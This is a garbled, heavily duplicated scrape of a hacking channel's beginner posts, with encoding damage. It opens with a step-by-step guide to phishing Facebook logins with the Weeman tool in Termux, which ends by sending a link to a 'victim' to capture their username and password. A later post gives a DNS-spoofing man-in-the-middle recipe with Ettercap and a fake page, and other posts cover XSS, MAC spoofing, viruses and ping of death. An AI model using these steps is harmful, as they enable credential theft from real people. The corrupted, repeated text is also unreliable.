β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - evait-security/weeman: HTTP server for phishing in python
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#ForBeginers What is Cross Site Scripting (XSS)? & How it Work's ?
1) Cross-site scripting (XSS) is a type of cyberattack in which malicious scripts are injected into trusted and trusted sites.
2) Cross-site scripting attacks are possible in HTML, Flash, ActiveX and CSS. However, JavaScript is the most frequent target of cybercriminals as it plays an important role in most web browsing.
3) JavaScript is a programming language that allows you to implement complex functionality on your website. Most of the large and interactive websites on the Internet have been built with JavaScript. βYou can develop interactive features, games or add additional features to better promote your products,β says Domantas Gudelyauskas, marketing manager for the Zyro project.
4) JavaScript is so popular in the web community because it allows you to do almost anything on a web page. And that's when it becomes problematic. Cybercriminals can use JavaScript to log into your web pages and insert malicious scripts.
π¦How does cross-site scripting work?
Cybercriminals can perform XSS attacks on WordPress websites in two ways. They can either use user input or bypass policies of the same origin. Let's take a look at both methods to better understand cross-site scripting.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How to Change the MAC Address
#forBeginers
In a Kali Linux, it is very easy to spoof the MAC address. This can be done by opening the terminal window in the Kali Linux system. Initially, we will check all of the adapters that are using the ifconfig command, as shown:
1) $ sudo ifconfig
2) $ sudo ifconfig eth0 down
3) Next, we will change the MAC address. This can be done by entering the following command:
$ sudo macchanger -r eth0
4) In this command, the -r flag is used to change the current MAC address to the random MAC address in the network interface of eth0.
In the screenshot above, note that the MAC address has been successfully spoofed. Now, we will turn on the network interface again.
5) This can be done by entering the following command:
$ sudo ifconfig eth0 up
6) Next, it is necessary to check the MAC address again with the help of the ifconfig command:
$ sudo ifconfig
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MAN-IN-MIDDLE ATTACK #ForBeginers :
π»π΄π 'π π π π°π π :
Launch the Parrot or Kali Linux machine to get started.
Set up the DNS config file in Ettercap
1) Setup the command terminal and change the DNS configuration of the Ettercap by typing the following syntax into the editor of your choice.
$ gedit /etc/ettercap/etter.dns
2) You will be displayed the DNS configuration file.
3) Next, youβll need to type your address in the terminal
>* a 10.0.2.15
4) Check your IP address by typing ifconfig in a new terminal if you donβt already know what it is.
To save changes, press ctrl+x, and press (y) bottom.
Prepare the Apache server
5) Now, we will move our fake security page to a location on the Apache server and run it. You will need to move your fake page to this apache directory.
6) Run the following command to format the HTML directory:
$ Rm /Var/Www/Html/*
7) Next up, youβll need to save your fake security page and upload it to the directory weβve mentioned. Type the following in the terminal to start the upload:
$ mv /root/Desktop/fake.html /var/www/html
8) Now fire up the Apache Server with the following command:
$ sudo service apache2 start
9) Youβll see that the server has successfully launched.
Spoofing with Ettercap addon
Now weβll see how Ettercap would come into play. We will be DNS spoofing with Ettercap.
10) Launch the app by typing:
$ettercap -G
source linux forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is Shell? Understand the concept of Shell in 1 minute! #ForBeginers
> The operating systems we use now (Windows, Mac OS, Android , iOS, etc.) are all with a graphical interface, simple and intuitive, easy to use, for professional users (programmers, network managers, etc.) and ordinary users (housewives, elderly, etc.) ) Are very applicable; the popularity of computers is inseparable from the graphical interface.
> However, in the early days of computers, there was no graphical interface. We could only control the computer through commands one by one. There are hundreds of these commands, not to mention that it is very difficult to remember these commands. "Black screen" itself is a boring thing; computers at this time are far from being cool and popular, and only professionals can use it.
> the only thing that can control the computer hardware (CPU, memory, display, etc.) is the kernel of the operating system. The graphical interface and the command line are just a bridge between the user and the kernel.
If you do not understand the role of the operating system, please go to " What is an operating system ".
Due to security, complexity, cumbersome and other reasons, users cannot directly access the kernel (not necessary), and need to develop another program to allow users to directly use this program; the function of the program is to receive user operations (click on the icon, enter commands) , And perform simple processing, and then pass to the kernel, so that users can indirectly use the operating system kernel. You see, adding a layer of "agent" between the user and the kernel can not only simplify the user's operation, but also ensure the security of the kernel. Why not?
> The user interface and command line are this separately developed program, which is the "agent". Under Linux, this command line program is called Shell .
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE SECURITY
BURPSUITE FULL PRACTICAL.pdf
COMMANDS + PICTURES + EXAMPLES #FORBeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAs & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAs & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DevSecOps?
#Forbeginers :)))
DevSecOps is security as a code culture where you integrate security tools into the DevOps lifecycle.
Security as part of the DevOps process is the only way to mitigate risk.
It is a transformational shift that includes the culture, practices, and security tools at every stage of the DevOps process.
It removes silos between development, security, and admin teams.
It follows a 'shift to the left' approach, which means implementing security processes early in the design / planning phase to provide security awareness for development and administration teams and meet cybersecurity requirements.
Here's how DevSecOps is implemented:
Security and development team collaboration on a threat model
Integration of security tools into the development pipeline
Prioritize security requirements as part of the product backlog
Reviewing infrastructure-related security policies prior to deployment
Security experts evaluate automated tests.
Modern technological innovation plays a vital role in DevSecOps.
Security as code, compliance as code, and infrastructure as code can eliminate many of the manual security steps and improve overall efficiency.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is DevSecOps?
#Forbeginers :)))
DevSecOps is security as a code culture where you integrate security tools into the DevOps lifecycle.
Security as part of the DevOps process is the only way to mitigate risk.
It is a transformational shift that includes the culture, practices, and security tools at every stage of the DevOps process.
It removes silos between development, security, and admin teams.
It follows a 'shift to the left' approach, which means implementing security processes early in the design / planning phase to provide security awareness for development and administration teams and meet cybersecurity requirements.
Here's how DevSecOps is implemented:
Security and development team collaboration on a threat model
Integration of security tools into the development pipeline
Prioritize security requirements as part of the product backlog
Reviewing infrastructure-related security policies prior to deployment
Security experts evaluate automated tests.
Modern technological innovation plays a vital role in DevSecOps.
Security as code, compliance as code, and infrastructure as code can eliminate many of the manual security steps and improve overall efficiency.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is ping of death ?
#forbeginers
Ping of Death is a type of Denial of Service ( DoS) attack in which, by sending malformed or oversized packets using a simple ping order, an attacker attempts to crash, destabilize, or freeze the targeted device or service.
While PoD attacks are leveraging legacy flaws in target systems that may have been patched. The attack is still important and dangerous in an unpatched scheme, however. A new form of PoD attack has become common recently. The targeted device is hit by this attack, commonly known as a Ping flood, with ICMP packets sent rapidly via ping without waiting for replies.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is ping of death ?
#forbeginers
Ping of Death is a type of Denial of Service ( DoS) attack in which, by sending malformed or oversized packets using a simple ping order, an attacker attempts to crash, destabilize, or freeze the targeted device or service.
While PoD attacks are leveraging legacy flaws in target systems that may have been patched. The attack is still important and dangerous in an unpatched scheme, however. A new form of PoD attack has become common recently. The targeted device is hit by this attack, commonly known as a Ping flood, with ICMP packets sent rapidly via ping without waiting for replies.
β β β Uππ»βΊπ«Δπ¬πβ β β β